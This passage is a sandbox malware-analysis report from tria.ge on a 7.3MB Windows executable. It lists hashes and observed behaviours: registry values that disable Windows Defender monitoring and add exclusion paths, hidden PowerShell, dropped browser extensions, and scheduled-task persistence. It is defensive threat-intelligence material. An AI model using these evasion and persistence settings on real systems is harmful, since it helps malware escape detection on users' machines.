Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
223s -
max time network
230s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
08/07/2024, 05:03
Static task
static1
Behavioral task
behavioral1
Sample
7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe
Resource
win7-20240705-en
General
-
Target
7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe
-
Size
7.3MB
-
MD5
ad7f2a7bfc3a95fef273ace9a215c988
-
SHA1
5044a0cc66519fdcfbfbf232954c27e2527d29c6
-
SHA256
7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56
-
SHA512
66cceedb92d3b5b38005c0016900dfaf9e40b4a0ea66bf617355e20e8084214d2f1d31ebe68bac74b898209dfccd5669afd245494c30d4ddd18c3bae1667cc1d
-
SSDEEP
196608:91O5X2jQimknPT+pXYzohYye6NDw2yBtJHl:3O5XlZUPS68mye2DXyvJHl
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NFFblPWVSTUU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oMPLyiqsgsRtC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RkUDfeHyKRZhrXlO = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NFFblPWVSTUU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\RfQdYYQjhFJxkqVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oMPLyiqsgsRtC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RkUDfeHyKRZhrXlO = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\eveqWKwISMUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RkUDfeHyKRZhrXlO = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\RkUDfeHyKRZhrXlO = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OniiUkVuU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\eveqWKwISMUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OniiUkVuU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\RfQdYYQjhFJxkqVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 27 1104 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 2628 powershell.exe 580 powershell.EXE 1700 powershell.EXE 2664 powershell.exe 2816 powershell.EXE 2056 powershell.exe 2344 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3502430532-24693940-2469786940-1000\Control Panel\International\Geo\Nation mqcBDmi.exe -
Executes dropped EXE 4 IoCs
pid Process 2352 Install.exe 2712 Install.exe 2840 jlvUgcu.exe 3060 mqcBDmi.exe -
Loads dropped DLL 23 IoCs
pid Process 1760 7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe 2352 Install.exe 2352 Install.exe 2352 Install.exe 2352 Install.exe 2712 Install.exe 2712 Install.exe 2712 Install.exe 1920 WerFault.exe 1920 WerFault.exe 1920 WerFault.exe 1104 rundll32.exe 1104 rundll32.exe 1104 rundll32.exe 1104 rundll32.exe 1672 WerFault.exe 1672 WerFault.exe 1672 WerFault.exe 1672 WerFault.exe 2312 WerFault.exe 2312 WerFault.exe 2312 WerFault.exe 1672 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json mqcBDmi.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json mqcBDmi.exe -
Drops file in System32 directory 24 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 mqcBDmi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 mqcBDmi.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol jlvUgcu.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini jlvUgcu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 mqcBDmi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 mqcBDmi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA mqcBDmi.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol mqcBDmi.exe File created C:\Windows\system32\GroupPolicy\gpt.ini jlvUgcu.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol jlvUgcu.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat mqcBDmi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 mqcBDmi.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA mqcBDmi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 mqcBDmi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 mqcBDmi.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 mqcBDmi.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi mqcBDmi.exe File created C:\Program Files (x86)\OniiUkVuU\ZBTPGyo.xml mqcBDmi.exe File created C:\Program Files (x86)\oMPLyiqsgsRtC\EfYYQiW.dll mqcBDmi.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi mqcBDmi.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja mqcBDmi.exe File created C:\Program Files (x86)\NFFblPWVSTUU2\gxppMcuHcPngg.dll mqcBDmi.exe File created C:\Program Files (x86)\NFFblPWVSTUU2\ZcASiPD.xml mqcBDmi.exe File created C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR\XkZlrsM.xml mqcBDmi.exe File created C:\Program Files (x86)\oMPLyiqsgsRtC\xaXYsNF.xml mqcBDmi.exe File created C:\Program Files (x86)\OniiUkVuU\xpcHPg.dll mqcBDmi.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak mqcBDmi.exe File created C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR\lshhmzP.dll mqcBDmi.exe File created C:\Program Files (x86)\eveqWKwISMUn\DVmMCLk.dll mqcBDmi.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bYIjjyXTgczhZAJGMW.job schtasks.exe File created C:\Windows\Tasks\akamOyUwOLVWEybrw.job schtasks.exe File created C:\Windows\Tasks\yDlQlQjTItyRqSH.job schtasks.exe File created C:\Windows\Tasks\DxfwWIkYFsDOIQKWf.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 1920 2840 WerFault.exe 41 2312 3060 WerFault.exe 185 1672 2712 WerFault.exe 31 -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 mqcBDmi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" jlvUgcu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings mqcBDmi.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0106000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates mqcBDmi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" jlvUgcu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs mqcBDmi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-d0-89-56-f1-42\WpadDecision = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-d0-89-56-f1-42\WpadDecision = "0" mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs mqcBDmi.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000d0effae3f4d0da01 jlvUgcu.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-d0-89-56-f1-42 mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs mqcBDmi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{90F424A6-6FFB-4948-B1E2-35BC3399FDB1}\aa-d0-89-56-f1-42 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-d0-89-56-f1-42 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-d0-89-56-f1-42\WpadDecisionReason = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates mqcBDmi.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs mqcBDmi.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{90F424A6-6FFB-4948-B1E2-35BC3399FDB1} mqcBDmi.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0106000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mqcBDmi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{90F424A6-6FFB-4948-B1E2-35BC3399FDB1}\WpadDecision = "0" mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs mqcBDmi.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 103809e4f4d0da01 powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed mqcBDmi.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-d0-89-56-f1-42\WpadDecisionTime = 50b781f7f4d0da01 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{90F424A6-6FFB-4948-B1E2-35BC3399FDB1}\WpadNetworkName = "Network 3" mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates mqcBDmi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix mqcBDmi.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" mqcBDmi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\aa-d0-89-56-f1-42\WpadDecisionReason = "1" mqcBDmi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs mqcBDmi.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2592 schtasks.exe 2568 schtasks.exe 548 schtasks.exe 2852 schtasks.exe 1148 schtasks.exe 352 schtasks.exe 2568 schtasks.exe 2536 schtasks.exe 2100 schtasks.exe 1980 schtasks.exe 1236 schtasks.exe 2436 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 30 IoCs
pid Process 2628 powershell.exe 580 powershell.EXE 580 powershell.EXE 580 powershell.EXE 1700 powershell.EXE 1700 powershell.EXE 1700 powershell.EXE 2664 powershell.exe 2816 powershell.EXE 2816 powershell.EXE 2816 powershell.EXE 3060 mqcBDmi.exe 3060 mqcBDmi.exe 3060 mqcBDmi.exe 3060 mqcBDmi.exe 3060 mqcBDmi.exe 2056 powershell.exe 3060 mqcBDmi.exe 3060 mqcBDmi.exe 3060 mqcBDmi.exe 2344 powershell.exe 3060 mqcBDmi.exe 3060 mqcBDmi.exe 3060 mqcBDmi.exe 3060 mqcBDmi.exe 3060 mqcBDmi.exe 3060 mqcBDmi.exe 3060 mqcBDmi.exe 3060 mqcBDmi.exe 3060 mqcBDmi.exe -
Suspicious use of AdjustPrivilegeToken 63 IoCs
description pid Process Token: SeDebugPrivilege 2628 powershell.exe Token: SeIncreaseQuotaPrivilege 1660 WMIC.exe Token: SeSecurityPrivilege 1660 WMIC.exe Token: SeTakeOwnershipPrivilege 1660 WMIC.exe Token: SeLoadDriverPrivilege 1660 WMIC.exe Token: SeSystemProfilePrivilege 1660 WMIC.exe Token: SeSystemtimePrivilege 1660 WMIC.exe Token: SeProfSingleProcessPrivilege 1660 WMIC.exe Token: SeIncBasePriorityPrivilege 1660 WMIC.exe Token: SeCreatePagefilePrivilege 1660 WMIC.exe Token: SeBackupPrivilege 1660 WMIC.exe Token: SeRestorePrivilege 1660 WMIC.exe Token: SeShutdownPrivilege 1660 WMIC.exe Token: SeDebugPrivilege 1660 WMIC.exe Token: SeSystemEnvironmentPrivilege 1660 WMIC.exe Token: SeRemoteShutdownPrivilege 1660 WMIC.exe Token: SeUndockPrivilege 1660 WMIC.exe Token: SeManageVolumePrivilege 1660 WMIC.exe Token: 33 1660 WMIC.exe Token: 34 1660 WMIC.exe Token: 35 1660 WMIC.exe Token: SeDebugPrivilege 580 powershell.EXE Token: SeDebugPrivilege 1700 powershell.EXE Token: SeDebugPrivilege 2664 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2752 WMIC.exe Token: SeIncreaseQuotaPrivilege 2752 WMIC.exe Token: SeSecurityPrivilege 2752 WMIC.exe Token: SeTakeOwnershipPrivilege 2752 WMIC.exe Token: SeLoadDriverPrivilege 2752 WMIC.exe Token: SeSystemtimePrivilege 2752 WMIC.exe Token: SeBackupPrivilege 2752 WMIC.exe Token: SeRestorePrivilege 2752 WMIC.exe Token: SeShutdownPrivilege 2752 WMIC.exe Token: SeSystemEnvironmentPrivilege 2752 WMIC.exe Token: SeUndockPrivilege 2752 WMIC.exe Token: SeManageVolumePrivilege 2752 WMIC.exe Token: SeDebugPrivilege 2816 powershell.EXE Token: SeDebugPrivilege 2056 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1412 WMIC.exe Token: SeIncreaseQuotaPrivilege 1412 WMIC.exe Token: SeSecurityPrivilege 1412 WMIC.exe Token: SeTakeOwnershipPrivilege 1412 WMIC.exe Token: SeLoadDriverPrivilege 1412 WMIC.exe Token: SeSystemtimePrivilege 1412 WMIC.exe Token: SeBackupPrivilege 1412 WMIC.exe Token: SeRestorePrivilege 1412 WMIC.exe Token: SeShutdownPrivilege 1412 WMIC.exe Token: SeSystemEnvironmentPrivilege 1412 WMIC.exe Token: 